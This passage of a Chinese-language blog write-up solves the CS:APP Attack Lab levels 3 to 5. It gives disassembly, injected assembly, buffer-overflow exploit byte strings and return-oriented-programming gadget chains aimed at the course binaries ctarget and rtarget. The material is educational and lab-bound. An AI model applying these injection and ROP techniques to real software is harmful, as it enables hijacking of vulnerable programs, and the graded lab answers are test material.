class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// getbuf 的 %rsp</span></span><br></pre></td></tr></table></figure>

<ul>
<li>通过命令 <strong>.&#x2F;hex2raw &lt; Level2.txt | .&#x2F;ctarget -q</strong> 将字节级表示转换为字符串作为参数运行程序</li>
</ul>
<h2 id="Result-1"><a href="#Result-1" class="headerlink" title="Result"></a>Result</h2><ul>
<li><strong>运行结果</strong></li>
</ul>
<img src="/2024/03/11/CSAPP-Lab3/image-20240312162217620.png" class="" title="image-20240312162217620">

<h1 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h1><ul>
<li>第 3 阶段还涉及代码注入攻击，但将字符串作为参数传递</li>
<li>在文件 ctarget 中，有函数 hexmatch 和 touch3 的代码，具有以下 C 表示形式</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="comment">/* Compare string to hex represention of unsigned value */</span></span><br><span class="line"><span class="number">2</span> <span class="type">int</span> <span class="title function_">hexmatch</span><span class="params">(<span class="type">unsigned</span> val, <span class="type">char</span> *sval)</span></span><br><span class="line">3 &#123;</span><br><span class="line"><span class="number">4</span> 		<span class="type">char</span> cbuf[<span class="number">110</span>];</span><br><span class="line"><span class="number">5</span> 		<span class="comment">/* Make position of check string unpredictable */</span></span><br><span class="line"><span class="number">6</span> 		<span class="type">char</span> *s = cbuf + random() % <span class="number">100</span>;</span><br><span class="line"><span class="number">7</span> 		<span class="built_in">sprintf</span>(s, <span class="string">&quot;%.8x&quot;</span>, val);</span><br><span class="line"><span class="number">8</span> 		<span class="keyword">return</span> <span class="built_in">strncmp</span>(sval, s, <span class="number">9</span>) == <span class="number">0</span>;</span><br><span class="line"><span class="number">9</span> &#125;</span><br><span class="line"><span class="number">7</span></span><br><span class="line"><span class="number">10</span></span><br><span class="line"><span class="number">11</span> <span class="type">void</span> <span class="title function_">touch3</span><span class="params">(<span class="type">char</span> *sval)</span></span><br><span class="line">12 &#123;</span><br><span class="line"><span class="number">13</span> 		vlevel = <span class="number">3</span>; <span class="comment">/* Part of validation protocol */</span></span><br><span class="line"><span class="number">14</span> 		<span class="keyword">if</span> (hexmatch(cookie, sval)) &#123;</span><br><span class="line"><span class="number">15</span> 			<span class="built_in">printf</span>(<span class="string">&quot;Touch3!: You called touch3(\&quot;%s\&quot;)\n&quot;</span>, sval);</span><br><span class="line"><span class="number">16</span> 			validate(<span class="number">3</span>);</span><br><span class="line"><span class="number">17</span> 		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"><span class="number">18</span> 			<span class="built_in">printf</span>(<span class="string">&quot;Misfire: You called touch3(\&quot;%s\&quot;)\n&quot;</span>, sval);</span><br><span class="line"><span class="number">19</span> 			fail(<span class="number">3</span>);</span><br><span class="line"><span class="number">20</span> 		&#125;</span><br><span class="line"><span class="number">21</span> 		<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"><span class="number">22</span> &#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><p>您的任务是让 CTARGET 执行 touch3 的代码，而不是返回测试</p>
</li>
<li><p>您必须让它看起来像 touch3，就好像您已经传递了 cookie 的字符串表示形式作为其参数一样</p>
<blockquote>
<p>将 cookie 字符串的字节级表示作为 touch3 的参数传递</p>
</blockquote>
</li>
<li><p>说明文档的一些建议</p>
<ul>
<li>您需要在漏洞利用字符串中包含 cookie 的字符串表示形式；字符串应由八个十六进制数字组成（从最高到最低有效排序），不带前导 0x</li>
<li>回想一下，字符串在 C 中表示为字节序列，后跟值为 0 的字节；在任何 Linux 机器上键入 man ascii 以查看所需字符的字节表示形式</li>
<li>注入的代码应将寄存器 %rdi 设置为此字符串的地址</li>
<li>当调用函数 hexmatch 和 strncmp 时，它们会将数据推送到堆栈上，覆盖保存 getbuf 使用的缓冲区的内存部分。因此，您需要小心放置 cookie 的字符串表示形式的位置</li>
</ul>
</li>
<li><p>分析 touch3 的汇编代码</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">00000000004018fa &lt;touch3&gt;:</span><br><span class="line">  4018fa:	53                   	push   %rbx				</span><br><span class="line">  4018fb:	48 89 fb             	mov    %rdi,%rbx					# %rbx = %rdi</span><br><span class="line">  4018fe:	c7 05 d4 2b 20 00 03 	movl   $0x3,0x202bd4(%rip)        # 6044dc &lt;vlevel&gt;</span><br><span class="line">  401905:	00 00 00 </span><br><span class="line">  401908:	48 89 fe             	mov    %rdi,%rsi					# %rsi = %rdi</span><br><span class="line">  40190b:	8b 3d d3 2b 20 00    	mov    0x202bd3(%rip),%edi        # 6044e4 &lt;cookie&gt; %edi = cookie</span><br><span class="line">  401911:	e8 36 ff ff ff       	callq  40184c &lt;hexmatch&gt;			# 调用 hexmatch</span><br><span class="line">  401916:	85 c0                	test   %eax,%eax			</span><br><span class="line">  401918:	74 23                	je     40193d &lt;touch3+0x43&gt;			# if %eax == 0，跳转到 40193d</span><br><span class="line">  40191a:	48 89 da             	mov    %rbx,%rdx					# %rdx = %rbx</span><br><span class="line">  40191d:	be 38 31 40 00       	mov    $0x403138,%esi				# %esi = 0x403138</span><br><span class="line">  401922:	bf 01 00 00 00       	mov    $0x1,%edi					# %edi = 0x1</span><br><span class="line">  401927:	b8 00 00 00 00       	mov    $0x0,%eax					# %eax = 0x0</span><br><span class="line">  40192c:	e8 bf f4 ff ff       	callq  400df0 &lt;__printf_chk@plt&gt;	# 调用 print_chk</span><br><span class="line">  401931:	bf 03 00 00 00       	mov    $0x3,%edi					# %edi = 0x3</span><br><span class="line">  401936:	e8 52 03 00 00       	callq  401c8d &lt;validate&gt;			# 调用 validate</span><br><span class="line">  40193b:	eb 21                	jmp    40195e &lt;touch3+0x64&gt;			# 直接跳转到 40195e</span><br><span class="line">  40193d:	48 89 da             	mov    %rbx,%rdx					# %rdx = %rbx</span><br><span class="line">  401940:	be 60 31 40 00       	mov    $0x403160,%esi				# %esi = 0x403160</span><br><span class="line">  401945:	bf 01 00 00 00       	mov    $0x1,%edi					# %edi = x01</span><br><span class="line">  40194a:	b8 00 00 00 00       	mov    $0x0,%eax					# %eax = 0x0</span><br><span class="line">  40194f:	e8 9c f4 ff ff       	callq  400df0 &lt;__printf_chk@plt&gt;	# 调用 print_chk</span><br><span class="line">  401954:	bf 03 00 00 00       	mov    $0x3,%edi					# %edi = 0x3</span><br><span class="line">  401959:	e8 f1 03 00 00       	callq  401d4f &lt;fail&gt;				# 调用 fail</span><br><span class="line">  40195e:	bf 00 00 00 00       	mov    $0x0,%edi					# %edi = 0x0</span><br><span class="line">  401963:	e8 d8 f4 ff ff       	callq  400e40 &lt;exit@plt&gt;			# 调用 exit</span><br></pre></td></tr></table></figure>

<ul>
<li><p>touch3 调用 hexmatch 将传递的字符串参数和 cookie 比较，如果参数是 cookie 的字符串形式，输出 **”Touch3!: You called touch3(&quot;%s&quot;)\n”**，否则输出 <strong>“Misfire: You called touch3(&quot;%s&quot;)\n”</strong></p>
</li>
<li><p>touch3 的起始地址为 <strong>0x4018fa</strong></p>
</li>
<li><p>思路分析</p>
<ul>
<li><p>通过命令 man ascii 查看 cookie 的字符串 “59b997fa” 的字节级表示为 <strong>35 39 62 39 39 37 66 61</strong></p>
</li>
<li><p>说明文档提醒我们 hexmatch 可能会覆盖 getbuf 的缓冲区，因此我们不能将字符串存储在 getbuf 的栈帧中，但我们可以把它存储在 test 的栈帧中</p>
</li>
<li><p>通过栈溢出的方式，修改 getbuf 的返回地址为 getbuf 的 %rsp 并将 cookie 的字符串的字节级表示存储在 test 的栈帧中</p>
</li>
<li><p>通过getbuf 将注入代码存储在 getbuf 的栈帧中</p>
</li>
<li><p>注入代码将存储在 test 栈帧中的字符串设置为 touch3 的参数，并跳转到 touch3 的起始地址</p>
</li>
</ul>
</li>
<li><p>我们需要 test 的 %rsp 来确定存储在 test 栈帧中的 cookie 字符串的起始地址</p>
</li>
<li><p>通过 gdb 调试工具在 getbuf 的 0x4017a8 处设置断点，查看 test 的 %rsp 的值为 <strong>0x5561dca0</strong>，所以 test 栈帧存储字符串的起始地址为 <strong>0x5561dca8</strong></p>
</li>
</ul>
<img src="/2024/03/11/CSAPP-Lab3/image-20240313115138026.png" class="" title="image-20240313115138026">

<h2 id="Solution-2"><a href="#Solution-2" class="headerlink" title="Solution"></a>Solution</h2><ul>
<li>getbuf 的 %rsp 仍然为 <strong>0x5561dc78</strong></li>
<li>创建 Level3.s 文件，写入注入代码</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">movq $0x5561dca8,%rdi</span><br><span class="line">pushq $0x4018fa</span><br><span class="line">ret</span><br></pre></td></tr></table></figure>

<ul>
<li>通过命令 <strong>gcc -c Level3.s</strong> 生成二进制文件 Level3.o</li>
<li>通过命令 <strong>objdump -d Level3.o &gt; Level3.d</strong> 得到 Level3.d，汇编代码的字节级表示</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Level3.o：     文件格式 elf64-x86-64</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Disassembly of section .text:</span><br><span class="line"></span><br><span class="line">0000000000000000 &lt;.text&gt;:</span><br><span class="line">   0:	48 c7 c7 a8 dc 61 55 	mov    $0x5561dca8,%rdi</span><br><span class="line">   7:	68 fa 18 40 00       	pushq  $0x4018fa</span><br><span class="line">   c:	c3                   	retq   </span><br></pre></td></tr></table></figure>

<ul>
<li>创建 Level3.txt 文件，写入输入值的字节级表示</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">48</span> c7 c7 a8 dc <span class="number">61</span> <span class="number">55</span> <span class="number">68</span>	<span class="comment">// 指令的字节级表示</span></span><br><span class="line">fa <span class="number">18</span> <span class="number">40</span> <span class="number">00</span> c3 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> </span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> </span><br><span class="line"><span class="number">78</span> dc <span class="number">61</span> <span class="number">55</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// getbuf 的 %rsp</span></span><br><span class="line"><span class="number">35</span> <span class="number">39</span> <span class="number">62</span> <span class="number">39</span> <span class="number">39</span> <span class="number">37</span> <span class="number">66</span> <span class="number">61</span>	<span class="comment">// 字符串的字节级表示</span></span><br></pre></td></tr></table></figure>

<ul>
<li>通过命令 <strong>.&#x2F;hex2raw &lt; Level3.txt | .&#x2F;ctarget -q</strong> 运行程序</li>
</ul>
<h2 id="Result-2"><a href="#Result-2" class="headerlink" title="Result"></a>Result</h2><ul>
<li><strong>运行结果</strong></li>
</ul>
<img src="/2024/03/11/CSAPP-Lab3/image-20240313120319386.png" class="" title="image-20240313120319386">

<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><ul>
<li>在使用 gdb 设置断点得到字符串在 test 栈帧中的地址时，发现的一些问题</li>
<li>第一次设置的断点在 test 的 0x40196c，得到 %rsp &#x3D; 0x5561dca8，所以推测字符串在 test 栈帧中存放在 0x5561dcd0，果不其然是错的</li>
<li>第二次设置的断点在 getbuf 的 0x4017a8，得到 test 的 %rsp &#x3D; 0x5561dca0，所以推测字符串存放在 0x5561dca8，是正确的</li>
<li>说明 test 在调用 getbuf 时，又额外分配了 8 字节的空间来存放返回地址</li>
</ul>
<h1 id="Return-Oriented-Programming"><a href="#Return-Oriented-Programming" class="headerlink" title="Return-Oriented Programming"></a>Return-Oriented Programming</h1><ul>
<li><p>对程序 RTARGET 执行代码注入攻击比对 CTARGET 要困难得多，因为它使用两种技术来阻止此类攻击：</p>
<ul>
<li>它使用随机化，使堆栈位置在一次运行中不同，这样就无法确定注入的代码将位于何处</li>
<li>它将保存堆栈的内存部分标记为不可执行，因此即使您可以将程序计数器设置为注入代码的开头，程序也会因分段错误而失败</li>
</ul>
</li>
<li><p>但我们可以通过执行现有代码而不是注入新代码来在程序中完成有用的事情</p>
</li>
<li><p>例如有一个 C 函数</p>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">setval_210</span><span class="params">(<span class="type">unsigned</span> *p)</span></span><br><span class="line">&#123;</span><br><span class="line">	*p = <span class="number">3347663060U</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>它的汇编代码如下</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">0000000000400f15 &lt;setval_210&gt;:</span><br><span class="line">400f15: c7 07 d4 48 89 c7 		movl $0xc78948d4,(%rdi)</span><br><span class="line">400f1b: c3 						retq</span><br></pre></td></tr></table></figure>

<ul>
<li><p>我们发现字节序列 48 89 c7 对指令 movq %rax,%rdi 编码、c3 对 ret 编码，这样我们就有了一个从 0x400f18 开始的小工具，它将复制寄存器 %rax 中的 64 位值到寄存器 %rdi</p>
</li>
<li><p>我们可以通过将这些小工具的地址放入栈中，每个小工具由一系列条指令和最后一个字节序列为 0xc3 编码的 ret 指令构成</p>
</li>
<li><p>当我们从配置的起始地址开始执行时，每个小工具的 ret 指令会跳转到下一个小工具的开头，从而执行一系列 n 个小工具</p>
</li>
</ul>
<img src="/2024/03/11/CSAPP-Lab3/image-20240313153659095.png" class="" title="image-20240313153659095">

<ul>
<li><p>说明文档的提醒</p>
<ul>
<li>小工具场由 rtarget 副本中的函数 start_farm 和 end_farm 划分</li>
<li>不要尝试从程序代码的其他部分构造小工具</li>
</ul>
</li>
<li><p>一些指令对应的字节级表示</p>
</li>
</ul>
<img src="/2024/03/11/CSAPP-Lab3/image-20240313154452626.png" class="" title="image-20240313154452626">

<h1 id="Level-4"><a href="#Level-4" class="headerlink" title="Level 4"></a>Level 4</h1><ul>
<li>要求<ul>
<li>重复 Level2 的攻击，但使用小工具在程序 RTARGET 上执行此操作。</li>
<li>可以使用包含 movq、popq、ret、nop 指令类型的小工具构建解决方案</li>
<li>仅使用前 8 个 x86-64 寄存器 （%rax – %rdi）</li>
</ul>
</li>
<li>说明文档的一些建议<ul>
<li>您需要的所有小工具都可以在 rtarget 代码区域中找到，该代码区域由函数 start_farm 和 mid_farm 分隔</li>
<li>当小工具使用 popq 指令时，它会从堆栈中弹出数据。因此，您的漏洞利用字符串将包含小工具地址和数据的组合</li>
</ul>
</li>
<li>通过命令：<strong>objdump -d .&#x2F;rtarget&gt;&gt; rtarget.s</strong> 得到 rtarget.s 文件</li>
<li>思路分析<ul>
<li>通过 popq %rdi 将存放在栈中的 cookie 放入 %rdi</li>
<li>再通过 ret 取出并执行 touch2 的起始地址，实现跳转</li>
<li>popq %rdi 是字节序列为 <strong>5f</strong>，在 rtarget 的 start_farm 和 mid_farm 间并没有找到包含 5f 的字节序列，所以我们需要通过另一个寄存器中转</li>
<li>0x4019a7 处有字节序列 8d 87 51 73 58 90，取 <strong>0x4019ab</strong> 处 58 90 编码为 movq %rax nop，将 cookie 先存放在 %rax</li>
<li>0x4019c3 处有字节序列 c7 07 48 89 c7 90，取 <strong>0x4019c5</strong>  处 48 89 c7 90 编码为 movq %rax,%rdi nop，再将 cookie 从 %rax 传递到 %rdi</li>
</ul>
</li>
</ul>
<h2 id="Solution-3"><a href="#Solution-3" class="headerlink" title="Solution"></a>Solution</h2><ul>
<li>cookie 值为 0x59b997fa</li>
<li>touch2 的起始地址为 0x4017ec</li>
<li>创建 Level4.txt 文件，写入输入值的字节级表示</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">ab <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// popq %rax ret</span></span><br><span class="line">fa <span class="number">97</span> b9 <span class="number">59</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// cookie </span></span><br><span class="line">c5 <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// moveq %rax,%rdi ret </span></span><br><span class="line">ec <span class="number">17</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="comment">// touch2 的起始地址</span></span><br></pre></td></tr></table></figure>

<ul>
<li>通过命令 <strong>.&#x2F;hex2raw &lt; Level4.txt | .&#x2F;rtarget -q</strong> 运行程序</li>
</ul>
<h2 id="Result-3"><a href="#Result-3" class="headerlink" title="Result"></a>Result</h2><ul>
<li><strong>运行结果</strong></li>
</ul>
<img src="/2024/03/11/CSAPP-Lab3/image-20240314103504643.png" class="" title="image-20240314103504643">



<h1 id="Level-5"><a href="#Level-5" class="headerlink" title="Level 5"></a>Level 5</h1><ul>
<li><p>官方劝退</p>
<ul>
<li><p>在你进入第 5 阶段之前，请停下来考虑一下到目前为止你所取得的成就</p>
</li>
<li><p>在第 2 阶段和第 3 阶段，您让程序执行您自己设计的机器代码。如果 CTARGET 是一个网络服务器，你可以将自己的代码注入到遥远的机器中</p>
</li>
<li><p>在第 4 阶段中，您规避了现代系统用来阻止缓冲区溢出攻击的两个主要设备。虽然您没有注入自己的代码，但您可以注入一种通过将现有代码序列拼接在一起来运行的程序</p>
</li>
<li><p>您还获得了 95&#x2F;100 的实验室分数。这是一个很好的分数。如果您有其他紧迫的义务，请考虑立即停止</p>
</li>
<li><p>第 5 阶段要求您对 RTARGET 进行 ROP 攻击，以使用指向 cookie 的字符串表示形式的指针调用函数 touch3</p>
</li>
<li><p>这似乎并不比使用 ROP 攻击调用 touch2 困难得多，只是我们已经做到了</p>
</li>
<li><p>此外，第 5 阶段只计算 5 分，这并不是衡量它所需努力的真实衡量标准。对于那些想要超越课程正常期望的人来说，这更像是一个额外的学分问题</p>
</li>
</ul>
</li>
<li><p>说明文档的一些建议</p>
<ul>
<li><p>您可以在 rtarget 中由函数 start_farm 和 end_farm 分隔的代码区域中使用小工具，除了第 4 阶段中使用的小工具外，这个扩展的农场还包括不同 movl 指令的编码</p>
</li>
<li><p>服务器场的这一部分中的字节序列还包含用作功能 nop 的 2 字节指令，即它们不会更改任何寄存器或内存值</p>
</li>
</ul>
</li>
<li><p>思路分析</p>
<ul>
<li>%rsp 的地址值不能通过 gdb 调试工具确定，但我们可以执行 movq %rsp,%rdi 相关的指令得到 %rsp</li>
<li>不能简单的将 cookie 字符串存储在 %rsp，因为执行 movq %rsp,%rdi 后执行 ret，会取出并执行 cookie 字符串，造成错误</li>
<li>可以将 cookie 字符串存储在 touch3 起始地址后边，ret 取出执行 touch3 的起始地址</li>
<li>start_farm 和 end_farm 间有一个特殊的指令 <strong>lea (%rdi,%rsi,1),%rax</strong>， 我们事先计算好 cookie 字符串距离 %rsp 的偏移量，通过 %rsp + 偏移量将 cookie 字符串的起始地址赋给 %rdi</li>
</ul>
</li>
<li><p>想法很美好，现实很骨感！并不是需要哪些指令，就有哪些指令的 …… 我们需要东拼西凑实现我们的想法</p>
</li>
<li><p>具体实现如下</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">movq %rsp,%rax 			# 0x401a06	（得到 %rsp）</span><br><span class="line">ret</span><br><span class="line">movq %rax,%rdi			# 0x4019c5	（将 %rsp 赋值给 %rdi 用作计算）</span><br><span class="line">ret</span><br><span class="line">popq %rax				# 0x4019ab	（弹出偏移量到 %rax）</span><br><span class="line">ret</span><br><span class="line"># 偏移量</span><br><span class="line">movq %eax,%edx 			# 0x4019dd	（转移偏移量到 %esi）</span><br><span class="line">ret</span><br><span class="line">movq %edx,%ecx			# 0x401a69</span><br><span class="line">ret</span><br><span class="line">movq %ecx,%esi			# 0x401a13</span><br><span class="line">ret</span><br><span class="line">lea (%rdi,%rsi,1),%rax	# 0x4019d6	（计算字符串的起始地址）</span><br><span class="line">ret</span><br><span class="line">movq %rax,%rdi			# 0x4019c5	（将字符串起始地址赋给 %rdi 作为 touch3 的参数）</span><br><span class="line">ret						#			（取出并执行 touch3）</span><br><span class="line"># touch3 起始地址</span><br><span class="line"># cookie</span><br></pre></td></tr></table></figure>

<blockquote>
<p>说明文档提醒我们，有些字节序列还包含用作功能 nop 的 2 字节指令，比如 0x401a69 处 89 d1 08 db，89 d1 编码为 movl %edx,%ecx，08 db 实测没有什么影响</p>
</blockquote>
<ul>
<li>ret，%rsp +&#x3D; 8，popq，%rsp -&#x3D; 8，所以偏移量为：<strong>0x48（72）</strong></li>
</ul>
<h2 id="Solution-4"><a href="#Solution-4" class="headerlink" title="Solution"></a>Solution</h2><ul>
<li>touch3 的起始地址 0x4018fa</li>
<li>cookie 字符串形式的字节级表示 35 39 62 39 39 37 66 61</li>
<li>创建 Level5.txt 文件，写入输入值的字节级表示</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	</span><br><span class="line"><span class="number">06</span> <span class="number">1</span>a <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// movq %rsp,%rax</span></span><br><span class="line">c5 <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// movq %rax,%rdi	</span></span><br><span class="line">ab <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// popq %rax</span></span><br><span class="line"><span class="number">48</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// 偏移量</span></span><br><span class="line">dd <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// movl %eax,%edx</span></span><br><span class="line"><span class="number">69</span> <span class="number">1</span>a <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// movl %edx,%ecx</span></span><br><span class="line"><span class="number">13</span> <span class="number">1</span>a <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// movl %ecx,%esi</span></span><br><span class="line">d6 <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// lea (%rdi,%rsi,1),%rax</span></span><br><span class="line">c5 <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// movq %rax,%rdi</span></span><br><span class="line">fa <span class="number">18</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// touch3 起始地址</span></span><br><span class="line"><span class="number">35</span> <span class="number">39</span> <span class="number">62</span> <span class="number">39</span> <span class="number">39</span> <span class="number">37</span> <span class="number">66</span> <span class="number">61</span>	<span class="comment">// cookie 字符串</span></span><br></pre></td></tr></table></figure>

<ul>
<li>通过命令 <strong>.&#x2F;hex2raw &lt; Level5.txt | .&#x2F;rtarget -q</strong> 运行程序</li>
</ul>
<h2 id="Result-4"><a href="#Result-4" class="headerlink" title="Result"></a>Result</h2><ul>
<li><strong>运行结果</strong></li>
</ul>
<img src="/2024/03/11/CSAPP-Lab3/image-20240315092444544.png" class="" title="image-20240315092444544">

<h1 id="References"><a href="#References" class="headerlink" title="References"></a>References</h1><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/JayL-zxl/p/14361158.html">图文并茂-超详解 CS:APP: Lab3-Attack（附带栈帧分析) - 周小伦 - 博客园 (cnblogs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/476396465">CSAPP | Lab3-Attack Lab 深入解析 - 知乎 (zhihu.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.viseator.com/2017/07/18/CS_APP_AttackLab/#%E5%AE%9E%E9%AA%8C%E5%B0%8F%E7%BB%93">深入理解计算机系统（CS:APP) - Attack Lab详解 | viseator’s blog</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/410418053">csapp-attacklab 详解 - 知乎 (zhihu.com)</a></p>
